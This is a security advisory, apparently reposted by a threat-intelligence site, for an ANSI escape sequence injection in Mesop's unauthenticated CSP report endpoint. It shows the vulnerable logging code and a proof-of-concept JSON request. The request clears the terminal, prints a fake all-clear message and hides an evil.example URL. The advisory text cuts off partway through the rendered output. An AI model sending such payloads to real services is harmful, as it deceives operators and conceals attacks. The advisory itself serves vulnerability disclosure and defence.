CVE-2026-93421
### Summary The `/__csp__` endpoint accepts unauthenticated JSON reports and logs user-controlled values directly to stdout using `print()` without escaping control characters. A remote attacker can include ANSI/VT100 escape sequences in fields such as `blocked-uri` or `document-uri`. When the logs are viewed in an ANSI-capable terminal, these sequences can manipulate the displayed output (e.g., clear the screen, hide text, or inject misleading messages), affecting the integrity of operator-facing logs. ### Details The CSP reporting endpoint accepts arbitrary JSON and prints several request fields directly: mesop/server/static_file_serving.py ```python @app.route(prefix_base_url("/__csp__"), methods=["POST"]) def csp_report(): report = request.get_json(force=True) document_uri = report["csp-report"]["document-uri"] blocked_uri = report["csp-report"]["blocked-uri"] violated_directive = report["csp-report"]["violated-directive"] print(f"... Blocked URL: {blocked_uri} ...") ``` Since these values are written to stdout without sanitization, ANSI escape sequences supplied by a remote client are preserved and interpreted by ANSI-compatible terminals. ### PoC Send the following request: ```http POST /__csp__ Content-Type: application/json { "csp-report": { "document-uri": "https://victim.example", "blocked-uri": "\u001b[2J\u001b[H\u001b[32m*** SECURITY OK - No CSP violations found ***\u001b[0m\n\u001b[8mhttps://evil.example", "violated-directive": "script-src-elem" } } ``` The request is accepted (HTTP 204), and the injected escape sequences are written to stdout unchanged. When the captured output is rendered in a VT100-compatible terminal (verified using `pyte`), the original CSP warning is visually replaced with attacker-controlled content. **Expected output** ```text Content Security Policy Error Directive: script-src-elem Blocked URL: ... App path: /app ``` **Rendered output** ```text *** SECURITY OK - No CSP
Properties
- ghsa_id
- GHSA-g7f6-rxc4-qhph
- severity
- medium
- summary
- Mesop: Unauthenticated ANSI Escape Sequence Injection in CSP Reporting Endpoint
- cve_id
- CVE-2026-93421
- signal_observed_at
- 2026-09-23T22:45:22+00:00
- is_ghsa_only
- false
- ghsa_published
- 2026-09-23T19:01:05Z
- source_url
- https://github.com/advisories/GHSA-g7f6-rxc4-qhph
- ghsa_updated
- 2026-09-23T19:01:06Z
Related Entities (5)
AFFECTS (1)
HAS_WEAKNESS (2)
REPORTED_BY (1)
VULNERABLE_TO (1)
Explore deeper with Ninja Signal's threat intelligence graph